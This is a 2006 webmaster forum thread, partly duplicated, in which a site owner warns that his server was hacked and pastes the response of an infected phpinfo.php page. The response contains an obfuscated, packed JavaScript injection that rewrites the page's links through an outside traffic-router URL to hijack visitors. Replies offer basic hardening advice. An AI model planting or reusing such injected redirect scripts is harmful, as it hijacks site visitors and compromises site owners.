Hacking server and redirecting - GoFuckYourself.com

blablabla · 05-24-2006, 04:47 AM

Be aware! I got my server hacked for redirecting reasons.

For those that think their traffic looks strange check your phpinfo.php file:

GET /phpinfo.php HTTP/1.0
Host: XXX
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows XP; DigExt)
Accept-Language: en-us
Referer: http://google.com/
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Wed, 24 May 2006 09:31:12 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
Vary: Referer
X-Powered-By: PHP/4.3.10
Expires: Tue, 01 Jan 1990 00:00:00 GMT
Last-Modified: Wed, 24 May 2006 09:31:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Connection: close
Content-Type: text/html

eval(function(p,a,c,k,e,d){e=function(c){return(c< a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.A(\'<w v="e()">\');h e(){5 s="r://p-k.o/n.m?l=x&u=";9(2.7.8("f=1")hahahaha-1&&2.7.8("q")hahahaha-1&&2.7.8("y")hahahaha-1&&2.G.8("H")hahahaha-1){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=s+2.3[i].4}5 g=d c();5 6=d c();6.E(g.C()+B);2.7="f=1; 6="+6.z();h b(){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=2.3[i].4.F(s.a)}}t(b,D)}}',44,44,'||document|links|href| var|expires|cookie|indexOf|if|length|normal|Date|n ew|remake|zq|today|function||for|router|affid|php| traff|com|gall|adm|http||setTimeout||onclick|body| frog33|login|toGMTString|write|86400000|getTime|30 0|setTime|substring|referrer|admin'.split('|')))

fris · 05-24-2006, 04:51 AM

thats why you disable the phpinfo file

PussyTeenies · 05-24-2006, 04:51 AM

does EVRYBODY have a phpinfo.php file??

PussyTeenies · 05-24-2006, 04:57 AM

just use this in httpd.conf , htaccess or php.ini
disable_functions = phpinfo

Screaming · 05-24-2006, 05:57 AM

damn that sucks ass..

redfrog · 05-24-2006, 06:00 AM

this code above , where do u see the redirecting code? and plz explain how to check the php info file

thnaks

directfiesta · 05-24-2006, 08:46 AM

Clients mostly want the phpinfo file.

It gives a lot of info ( if not all ) on the server... But that same info is available to the hackers ...

This article explains a bit, but it is in french ( coding isn't ).

blablabla · 05-24-2006, 02:05 PM

Can anybody suggest to me how is the best and most efficient way to get this hacking dude and his site down with the neck? To send a complaint to his host??

blablabla · 05-26-2006, 05:40 AM

bump it up

flashbang · 05-26-2006, 07:29 AM

Server: Apache/1.3.33 (Unix) PHP/4.3.10

That would probably explain why you got hacked

You need to hire someone to update your servers if you are not going to

blablabla · 05-26-2006, 07:34 AM

Quote:

Originally Posted by flashbang

Server: Apache/1.3.33 (Unix) PHP/4.3.10

That would probably explain why you got hacked

You need to hire someone to update your servers if you are not going to

Thanks for that info man...

flashbang · 05-26-2006, 07:35 AM

I know a guy who can do that for you in like 20 minutes, post your info if you want him to contact you

05-24-2006, 04:47 AM	#1
blablabla Confirmed User Join Date: Feb 2005 Posts: 210	Hacking server and redirecting Be aware! I got my server hacked for redirecting reasons. For those that think their traffic looks strange check your phpinfo.php file: GET /phpinfo.php HTTP/1.0 Host: XXX User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows XP; DigExt) Accept-Language: en-us Referer: http://google.com/ Accept-Encoding: gzip, deflate HTTP/1.1 200 OK Date: Wed, 24 May 2006 09:31:12 GMT Server: Apache/1.3.33 (Unix) PHP/4.3.10 Vary: Referer X-Powered-By: PHP/4.3.10 Expires: Tue, 01 Jan 1990 00:00:00 GMT Last-Modified: Wed, 24 May 2006 09:31:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Connection: close Content-Type: text/html eval(function(p,a,c,k,e,d){e=function(c){return(c< a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.A(\'<w v="e()">\');h e(){5 s="r://p-k.o/n.m?l=x&u=";9(2.7.8("f=1")hahahaha-1&&2.7.8("q")hahahaha-1&&2.7.8("y")hahahaha-1&&2.G.8("H")hahahaha-1){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=s+2.3[i].4}5 g=d c();5 6=d c();6.E(g.C()+B);2.7="f=1; 6="+6.z();h b(){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=2.3[i].4.F(s.a)}}t(b,D)}}',44,44,'\|\|document\|links\|href\| var\|expires\|cookie\|indexOf\|if\|length\|normal\|Date\|n ew\|remake\|zq\|today\|function\|\|for\|router\|affid\|php\| traff\|com\|gall\|adm\|http\|\|setTimeout\|\|onclick\|body\| frog33\|login\|toGMTString\|write\|86400000\|getTime\|30 0\|setTime\|substring\|referrer\|admin'.split('\|')))

05-24-2006, 04:51 AM	#2
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	thats why you disable the phpinfo file __________________ Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff

05-24-2006, 04:51 AM	#3
PussyTeenies Confirmed User Join Date: Feb 2005 Location: Haarlem and Amsterdam, capital of the porn world ;-) Posts: 6,496	does EVRYBODY have a phpinfo.php file?? __________________ Need adult hosting? Contact us! WARM Hosting Need an IT solution? or someone to check your site and security? Nossie - IT Professional

05-24-2006, 04:57 AM	#4
PussyTeenies Confirmed User Join Date: Feb 2005 Location: Haarlem and Amsterdam, capital of the porn world ;-) Posts: 6,496	just use this in httpd.conf , htaccess or php.ini disable_functions = phpinfo __________________ Need adult hosting? Contact us! WARM Hosting Need an IT solution? or someone to check your site and security? Nossie - IT Professional

05-24-2006, 05:57 AM	#5
Screaming I can change this!!!!! Join Date: Feb 2004 Posts: 18,972	damn that sucks ass.. __________________

05-24-2006, 06:00 AM	#6
redfrog Registered User Join Date: Aug 2004 Location: il Posts: 78	this code above , where do u see the redirecting code? and plz explain how to check the php info file thnaks __________________ http://www.jigglymelons.com \| http://www.jigglymelons.com/mgp

05-24-2006, 08:46 AM	#7
directfiesta Too lazy to set a custom title Industry Role: Join Date: Oct 2002 Location: Montreal, Quebec Posts: 29,677	Clients mostly want the phpinfo file. It gives a lot of info ( if not all ) on the server... But that same info is available to the hackers ... This article explains a bit, but it is in french ( coding isn't ). __________________ I know that Asspimple is stoopid ... As he says, it is a FACT ! But I can't figure out how he can breathe or type , at the same time ....

05-24-2006, 02:05 PM	#8
blablabla Confirmed User Join Date: Feb 2005 Posts: 210	Can anybody suggest to me how is the best and most efficient way to get this hacking dude and his site down with the neck? To send a complaint to his host??

05-26-2006, 05:40 AM	#9
blablabla Confirmed User Join Date: Feb 2005 Posts: 210	bump it up

05-26-2006, 07:29 AM	#10
flashbang Confirmed User Join Date: May 2006 Posts: 767	Server: Apache/1.3.33 (Unix) PHP/4.3.10 That would probably explain why you got hacked You need to hire someone to update your servers if you are not going to

05-26-2006, 07:35 AM	#12
flashbang Confirmed User Join Date: May 2006 Posts: 767	I know a guy who can do that for you in like 20 minutes, post your info if you want him to contact you